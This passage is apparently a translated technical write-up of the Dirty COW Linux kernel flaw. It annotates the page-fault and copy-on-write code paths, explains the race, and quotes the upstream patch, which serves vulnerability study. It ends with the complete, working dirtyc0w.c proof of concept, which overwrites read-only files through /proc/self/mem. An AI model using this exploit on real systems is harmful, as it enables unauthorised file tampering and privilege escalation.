	int ret;

	/* mlock all present pages, but do not fault in new pages */
	if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
		return -ENOENT;
	/* For mm_populate(), just skip the stack guard page. */
	if ((*flags & FOLL_POPULATE) &&
			(stack_guard_page_start(vma, address) ||
			 stack_guard_page_end(vma, address + PAGE_SIZE)))
		return -ENOENT;
	if (*flags & FOLL_WRITE) // is a write to the page requested?
		fault_flags |= FAULT_FLAG_WRITE;
	if (nonblocking)
		fault_flags |= FAULT_FLAG_ALLOW_RETRY;
	if (*flags & FOLL_NOWAIT)
		fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
	if (*flags & FOLL_TRIED) {
		VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
		fault_flags |= FAULT_FLAG_TRIED;
	}

	ret = handle_mm_fault(mm, vma, address, fault_flags);
	if (ret & VM_FAULT_ERROR) {
		if (ret & VM_FAULT_OOM)
			return -ENOMEM;
		if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
			return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
		if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
			return -EFAULT;
		BUG();
	}

	if (tsk) {
		if (ret & VM_FAULT_MAJOR)
			tsk->maj_flt++;
		else
			tsk->min_flt++;
	}

	if (ret & VM_FAULT_RETRY) {
		if (nonblocking)
			*nonblocking = 0;
		return -EBUSY;
	}

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags &= ~FOLL_WRITE; // the vulnerable line: write intent is dropped once COW has happened
	return 0;
}

__handle_mm_fault

static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
			     unsigned long address, unsigned int flags)
{
	pgd_t *pgd;
	pud_t *pud;
	pmd_t *pmd;
	pte_t *pte;

	if (unlikely(is_vm_hugetlb_page(vma)))
		return hugetlb_fault(mm, vma, address, flags);
	/*
	 * #define pgd_offset(mm, address) ((mm)->pgd + pgd_index(address))
	 *   mm->pgd is the pgd base address, address the linear address
	 * #define pgd_index(address) (((address) >> PGDIR_SHIFT) & (PTRS_PER_PGD-1))
	 * #define PGDIR_SHIFT 39
	 * #define PAGE_SHIFT 12
	 * #define PTRS_PER_PGD 512
	 * After expansion: pgd_index(address) = ((address >> 39) & 0x1ff),
	 * i.e. bits 39-47 of the address form the pgd index.
	 */
	pgd = pgd_offset(mm, address);
	pud = pud_alloc(mm, pgd, address);
	if (!pud)
		return VM_FAULT_OOM;
	pmd = pmd_alloc(mm, pud, address);
	if (!pmd)
		return VM_FAULT_OOM;
	if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
		int ret = create_huge_pmd(mm, vma, address, pmd, flags);
		if (!(ret & VM_FAULT_FALLBACK))
			return ret;
	} else {
		pmd_t orig_pmd = *pmd;
		int ret;

		barrier();
		if (pmd_trans_huge(orig_pmd)) {
			unsigned int dirty = flags & FAULT_FLAG_WRITE;

			/*
			 * If the pmd is splitting, return and retry the
			 * the fault. Alternative: wait until the split
			 * is done, and goto retry.
			 */
			if (pmd_trans_splitting(orig_pmd))
				return 0;

			if (pmd_protnone(orig_pmd))
				return do_huge_pmd_numa_page(mm, vma, address,
							     orig_pmd, pmd);

			if (dirty && !pmd_write(orig_pmd)) { // write fault on a non-writable huge pmd
				ret = wp_huge_pmd(mm, vma, address, pmd,
						  orig_pmd, flags);
				if (!(ret & VM_FAULT_FALLBACK))
					return ret;
			} else {
				huge_pmd_set_accessed(mm, vma, address, pmd,
						      orig_pmd, dirty);
				return 0;
			}
		}
	}

	/*
	 * Use __pte_alloc instead of pte_alloc_map, because we can't
	 * run pte_offset_map on the pmd, if an huge pmd could
	 * materialize from under us from a different thread.
	 */
	if (unlikely(pmd_none(*pmd)) &&
	    unlikely(__pte_alloc(mm, vma, pmd, address)))
		return VM_FAULT_OOM;
	/* if an huge pmd materialized from under us just retry later */
	if (unlikely(pmd_trans_huge(*pmd)))
		return 0;
	/*
	 * A regular pmd is established and it can't morph into a huge pmd
	 * from under us anymore at this point because we hold the mmap_sem
	 * read mode and khugepaged takes it in write mode. So now it's
	 * safe to run pte_offset_map().
	 */
	pte = pte_offset_map(pmd, address); // locate the pte entry

	return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}
handle_pte_fault
static int handle_pte_fault(struct mm_struct *mm,
		     struct vm_area_struct *vma, unsigned long address,
		     pte_t *pte, pmd_t *pmd, unsigned int flags)
{
	pte_t entry;
	spinlock_t *ptl;

	/*
	 * some architectures can have larger ptes than wordsize,
	 * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
	 * so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
	 * The code below just needs a consistent view for the ifs and
	 * we later double check anyway with the ptl lock held. So here
	 * a barrier will do.
	 */
	entry = *pte;
	barrier();
	if (!pte_present(entry)) {
		if (pte_none(entry)) {
			if (vma_is_anonymous(vma)) // include/linux/mm.h:1287
				// fault on an anonymous mapping
				return do_anonymous_page(mm, vma, address,
							 pte, pmd, flags);
			else
				// fault on a file-backed mapping
				return do_fault(mm, vma, address, pte, pmd,
						flags, entry);
		}
		// the pte exists but the page is not in physical memory: swap it in from disk
		return do_swap_page(mm, vma, address,
				    pte, pmd, flags, entry);
	}

	if (pte_protnone(entry))
		return do_numa_page(mm, vma, address, entry, pte, pmd);

	ptl = pte_lockptr(mm, pmd);
	spin_lock(ptl);
	if (unlikely(!pte_same(*pte, entry)))
		goto unlock;
	if (flags & FAULT_FLAG_WRITE) { // the fault was caused by a write
		if (!pte_write(entry)) // ... and the pte is not writable
			return do_wp_page(mm, vma, address,
					  pte, pmd, ptl, entry); // do_wp_page walks the virtual mappings of the physical page (under the pte lock to keep the count consistent); if the map count is 1 the page is used by this process alone, no COW is needed, and wp_page_reuse() is taken. See https://zhuanlan.zhihu.com/p/70779813
		entry = pte_mkdirty(entry);
	}
	entry = pte_mkyoung(entry);
	if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
		update_mmu_cache(vma, address, pte);
	} else {
		/*
		 * This is needed only for protection faults but the arch code
		 * is not yet telling us if this is a protection fault or not.
		 * This still avoids useless tlb flushes for .text page faults
		 * with threads.
		 */
		if (flags & FAULT_FLAG_WRITE)
			flush_tlb_fix_spurious_fault(vma, address);
	}
unlock:
	pte_unmap_unlock(pte, ptl);
	return 0;
}
do_fault
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pte_t *page_table, pmd_t *pmd,
		unsigned int flags, pte_t orig_pte)
{
	pgoff_t pgoff = (((address & PAGE_MASK) // page-aligned offset into the file
			- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;

	pte_unmap(page_table);
	/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
	if (!vma->vm_ops->fault)
		return VM_FAULT_SIGBUS;
	if (!(flags & FAULT_FLAG_WRITE)) // no write intent: do_read_fault returns the original page directly
		return do_read_fault(mm, vma, address, pmd, pgoff, flags,
				     orig_pte);
	if (!(vma->vm_flags & VM_SHARED)) // private write: copy-on-write, a fresh page is returned
		return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
				    orig_pte);
	return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte); // shared mapping: the original page is returned as well
}
do_cow_fault
static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd,
		pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
	struct page *fault_page, *new_page;
	struct mem_cgroup *memcg;
	spinlock_t *ptl;
	pte_t *pte;
	int ret;

	// allocate and prepare the anon_vma
	if (unlikely(anon_vma_prepare(vma)))
		return VM_FAULT_OOM;

	// allocate the user page that will hold the private copy
	new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);
	if (!new_page)
		return VM_FAULT_OOM;

	if (mem_cgroup_try_charge(new_page, mm, GFP_KERNEL, &memcg)) {
		page_cache_release(new_page);
		return VM_FAULT_OOM;
	}
	// fault in the file's original page as fault_page
	ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		goto uncharge_out;

	if (fault_page)
		// copy fault_page's contents into new_page
		copy_user_highpage(new_page, fault_page, address, vma);
	__SetPageUptodate(new_page);

	pte = pte_offset_map_lock(mm, pmd, address, &ptl);
	if (unlikely(!pte_same(*pte, orig_pte))) {
		pte_unmap_unlock(pte, ptl);
		if (fault_page) {
			unlock_page(fault_page);
			page_cache_release(fault_page);
		} else {
			/*
			 * The fault handler has no page to lock, so it holds
			 * i_mmap_lock for read to protect against truncate.
			 */
			i_mmap_unlock_read(vma->vm_file->f_mapping);
		}
		goto uncharge_out;
	}
	// wire new_page into the pte: the virtual-to-physical mapping is now complete
	do_set_pte(vma, address, new_page, pte, true, true);
	mem_cgroup_commit_charge(new_page, memcg, false);
	lru_cache_add_active_or_unevictable(new_page, vma);
	pte_unmap_unlock(pte, ptl);
	if (fault_page) {
		unlock_page(fault_page);
		page_cache_release(fault_page);
	} else {
		/*
		 * The fault handler has no page to lock, so it holds
		 * i_mmap_lock for read to protect against truncate.
		 */
		i_mmap_unlock_read(vma->vm_file->f_mapping);
	}
	return ret;
uncharge_out:
	mem_cgroup_cancel_charge(new_page, memcg);
	page_cache_release(new_page);
	return ret;
}
do_read_fault
static int do_read_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd,
		pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
	struct page *fault_page;
	spinlock_t *ptl;
	pte_t *pte;
	int ret = 0;

	/*
	 * Let's call ->map_pages() first and use ->fault() as fallback
	 * if page by the offset is not ready to be mapped (cold cache or
	 * something).
	 */
	if (vma->vm_ops->map_pages && fault_around_bytes >> PAGE_SHIFT > 1) {
		pte = pte_offset_map_lock(mm, pmd, address, &ptl);
		do_fault_around(vma, address, pte, pgoff, flags);
		if (!pte_same(*pte, orig_pte))
			goto unlock_out;
		pte_unmap_unlock(pte, ptl);
	}

	ret = __do_fault(vma, address, pgoff, flags, NULL, &fault_page);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		return ret;

	pte = pte_offset_map_lock(mm, pmd, address, &ptl);
	if (unlikely(!pte_same(*pte, orig_pte))) {
		pte_unmap_unlock(pte, ptl);
		unlock_page(fault_page);
		page_cache_release(fault_page);
		return ret;
	}
	// map the virtual address directly to fault_page, the file's page-cache page
	do_set_pte(vma, address, fault_page, pte, false, false);
	unlock_page(fault_page);
unlock_out:
	pte_unmap_unlock(pte, ptl);
	return ret;
}
__do_fault
static int __do_fault(struct vm_area_struct *vma, unsigned long address,
			pgoff_t pgoff, unsigned int flags,
			struct page *cow_page, struct page **page)
{
	// called as __do_fault(vma, address, pgoff, flags, new_page, &fault_page)
	struct vm_fault vmf;
	int ret;

	vmf.virtual_address = (void __user *)(address & PAGE_MASK);
	vmf.pgoff = pgoff;
	vmf.flags = flags;
	vmf.page = NULL;
	vmf.cow_page = cow_page;

	ret = vma->vm_ops->fault(vma, &vmf); // invoke the vma's own fault handler
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		return ret;
	if (!vmf.page)
		goto out;

	if (unlikely(PageHWPoison(vmf.page))) {
		if (ret & VM_FAULT_LOCKED)
			unlock_page(vmf.page);
		page_cache_release(vmf.page);
		return VM_FAULT_HWPOISON;
	}

	if (unlikely(!(ret & VM_FAULT_LOCKED)))
		lock_page(vmf.page);
	else
		VM_BUG_ON_PAGE(!PageLocked(vmf.page), vmf.page);

out:
	*page = vmf.page;
	return ret;
}

Page-Fault Flow Recap

Returning the correct physical page requires three passes through follow_page_mask and two through faultin_page:

  • The first follow_page_mask returns immediately because the virtual address has no physical page mapped yet; faultin_page is entered to handle the fault.
  • The first faultin_page goes through do_cow_fault, performing copy-on-write and mapping a new page at the virtual address.
  • The second follow_page_mask: the mapping now exists, but the pte is not writable while the caller wants to write, so the freshly mapped page is judged not to satisfy the request and NULL is returned.
  • The second faultin_page clears the flag recording the intent to write the page.
  • The third follow_page_mask finds a mapping that satisfies the request and returns the physical page to the caller.

(Screenshots of the first, second, and third passes omitted.)

The Patch

The patch introduces a dedicated copy-on-write flag: instead of clearing FOLL_WRITE, faultin_page now ORs in the new COW flag.
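
For reference, the upstream fix is commit 19be0eaffa3a ("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()"); its essence, quoted from memory and so to be treated as a sketch, is the new FOLL_COW flag:

/* in faultin_page(): instead of  *flags &= ~FOLL_WRITE;  record that COW happened */
if (ret & VM_FAULT_WRITE && !(vma->vm_flags & VM_WRITE))
	*flags |= FOLL_COW;

/* in follow_page_pte(): a read-only pte may only satisfy a FOLL_WRITE
 * request if COW really happened, i.e. the pte is dirty. */
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
	return pte_write(pte) ||
		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}
...
if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
	pte_unmap_unlock(ptep, ptl);
	return NULL;
}

With this, a mapping dropped by madvise(MADV_DONTNEED) can no longer downgrade the write into a read fault: the write intent survives, and the COW page is recreated instead of the file's original page being handed out.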


Summary

Dirty COW abuses the copy-on-write mechanism: a race condition deletes the key flag the kernel uses to decide whether copy-on-write is needed, tricking the kernel into handing out the wrong page. Being easy to exploit, it had enormous impact; the later Dirty Pipe vulnerability was even named after Dirty COW because of its similar flavor.

Full PoC

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
	char *str;
	str = (char *)arg;
	int i, c = 0;
	for (i = 0; i < 100000000; i++)
	{
		/*
		You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
		> This is achieved by racing the madvise(MADV_DONTNEED) system call
		> while having the page of the executable mmapped in memory.
		*/
		c += madvise(map, 100, MADV_DONTNEED);
	}
	printf("madvise %d\n\n", c);
}

void *procselfmemThread(void *arg)
{
	char *str;
	str = (char *)arg;
	/*
	You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
	> The in the wild exploit we are aware of doesn't work on Red Hat
	> Enterprise Linux 5 and 6 out of the box because on one side of
	> the race it writes to /proc/self/mem, but /proc/self/mem is not
	> writable on Red Hat Enterprise Linux 5 and 6.
	*/
	int f = open("/proc/self/mem", O_RDWR);
	int i, c = 0;
	for (i = 0; i < 100000000; i++) {
		/*
		You have to reset the file pointer to the memory position.
		*/
		lseek(f, (uintptr_t) map, SEEK_SET);
		c += write(f, str, strlen(str));
	}
	printf("procselfmem %d\n\n", c);
}


int main(int argc, char *argv[])
{
	/*
	You have to pass two arguments. File and Contents.
	*/
	if (argc < 3) {
		(void)fprintf(stderr, "%s\n",
		    "usage: dirtyc0w target_file new_content");
		return 1;
	}
	pthread_t pth1, pth2;
	/*
	You have to open the file in read only mode.
	*/
	f = open(argv[1], O_RDONLY);
	fstat(f, &st);
	name = argv[1];
	/*
	You have to use MAP_PRIVATE for copy-on-write mapping.
	> Create a private copy-on-write mapping. Updates to the
	> mapping are not visible to other processes mapping the same
	> file, and are not carried through to the underlying file. It
	> is unspecified whether changes made to the file after the
	> mmap() call are visible in the mapped region.
	*/
	/*
	You have to open with PROT_READ.
	*/
	map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
	printf("mmap %zx\n\n", (uintptr_t) map);
	/*
	You have to do it on two threads.
	*/
	pthread_create(&pth1, NULL, madviseThread, argv[1]);
	pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
	/*
	You have to wait for the threads to finish.
	*/
	pthread_join(pth1, NULL);
	pthread_join(pth2, NULL);
	return 0;
}

References

https://bbs.pediy.com/thread-266033.htm

https://dirtycow.ninja/

